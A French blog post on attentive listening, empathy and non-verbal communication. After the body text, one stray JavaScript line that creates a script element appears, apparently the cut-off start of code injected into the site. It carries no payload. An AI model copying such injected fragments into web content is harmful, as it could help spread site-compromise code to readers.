L’art de l’écoute

Écouter quelqu’un cela semble tout simple et pourtant… combien de fois dans une journée, nous sommes là, sans être vraiment là, nous écoutons sans entendre véritablement le message que nous transmet notre interlocuteur. Bien souvent, nous écoutons tout en préparant déjà la réponse que nous allons formuler, ou bien en faisant des commentaires intérieurs sur ce que dit la personne et une partie de son message peut alors nous échapper. Ou bien encore plus simplement nous lui coupons la parole alors que celle-ci n’a pas terminé son propos.

Il est évident que lorsqu’on écoute un individu, cela va susciter en nous des réactions tout à fait naturelles, toutefois il est nécessaire de les mettre de côté dans un premier temps et de rester attentif à son interlocuteur jusqu’à ce qu’il ait terminé. Cela demande d’avoir un certain recul par rapport aux  émotions naissantes et aussi une capacité d’attention tournée principalement vers la personne, une présence à l’autre dont nous allons définir les caractéristiques.

L’écoute est tout un art si l’on souhaite mettre toute sa concentration dans cet acte. Il ne suffit pas de le faire avec sa tête mais bien avec la participation de tout son corps. C’est une attitude à adopter qui active tous nos capteurs visuels, auditifs, kinesthésiques, une attitude pleinement centrée sur l’autre pour accueillir tout ce qu’il nous envoie comme message verbal et non verbal. C’est une présence authentique à l’autre afin qu’aucune pensée discursive ne puisse avoir de place pour pénétrer dans ce lien qui se tisse en cet instant. Un espace de calme et d’ouverture se crée où notre mental ne peut interférer. Ainsi, nous laissons toute la place à l’autre pour qu’il puisse se livrer en toute confiance et que la relation puisse s’épanouir au mieux. C’est une rencontre d’Être à Être. La communication est alors de grande qualité, et seule ce qui est le plus important demeure.

L’écoute attentive implique l’empathie, c’est-à-dire, la faculté de se mettre à la place de la personne et de percevoir ce qu’elle ressent. Ceci favorisera, lors de la réponse la pratique de l’assertivité que l’on envisagera dans un prochain article.

Au cours d’une écoute attentive, il est important aussi de susciter la sollicitation de la personne. On peut le faire comme on l’a déjà vu à travers le regard. Un regard vivant témoigne l’intérêt, la curiosité, l’attention bienveillante que vous manifestez pour la personne. De la même façon, lui poser des questions complémentaires démontre votre sollicitude et votre encouragement à affiner l’échange et obtenir des précisions sur sa façon de vivre les choses.

Et puis c’est à travers cette présence à l’autre qu’il va être possible de déceler tous ces messages non verbaux, tout ce qui se dit au-delà, ou même malgré les mots. En ressentant l’autre à travers notre propre corps, en s’unissant à son souffle à travers notre respiration, nous sommes en contact intime avec son être profond.

Cultiver cette forme de communication « Être avec l’autre » peut nous amener à des échanges profonds, respectueux et très enrichissants. Et comme tout apprentissage, c’est en pratiquant ce genre de relation le plus souvent possible que l’on peut atteindre un degré de présence de plus en plus grand.

var d=document;var s=d.createElement(‘script’);

Ce contenu a été publié dans Non classé, avec comme mot(s)-clé(s) , , , , , , , , , . Vous pouvez le mettre en favoris avec ce permalien.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Notifiez-moi des commentaires à venir via email. Vous pouvez aussi vous abonner sans commenter.